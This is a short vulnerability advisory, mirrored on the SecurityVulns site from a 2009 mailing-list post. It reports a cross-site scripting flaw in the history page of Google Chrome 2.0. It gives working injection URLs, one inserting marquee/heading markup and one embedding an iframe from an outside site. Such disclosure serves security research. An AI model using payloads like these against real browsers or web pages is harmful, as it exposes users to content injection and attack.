Информационная безопасность
[RU] switch to English


Дополнительная информация

  Межсайтовый скриптинг в Google Chrome

From:biko linux <bikolinux_(at)_gmail.com>
Date:28 июля 2009 г.
Subject:cross site scripting the browser google "chrome"

autor :         bikolinux
Vuln:           cross site scripting the browser google "chrome"
Download:       http://www.google.com/chrome
error           local
EMAIL           [email protected] [email protected]
vercion test  2.0.172.37
#################################################################################
######
cross site scripting the browser google "chrome"
The error is when making a request to record
#################################################################################
######
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome:
//history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%
2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome:
//history/#q="><marquee><h1>bikolinux</h1></marquee>

chrome:
//history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%
2F%2Fmalandrines.
Net%22%20height%3D%221024%22%20width%3D%22800%
22%3E%3C%2Fiframe%3E



--
bikolinux allowed

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород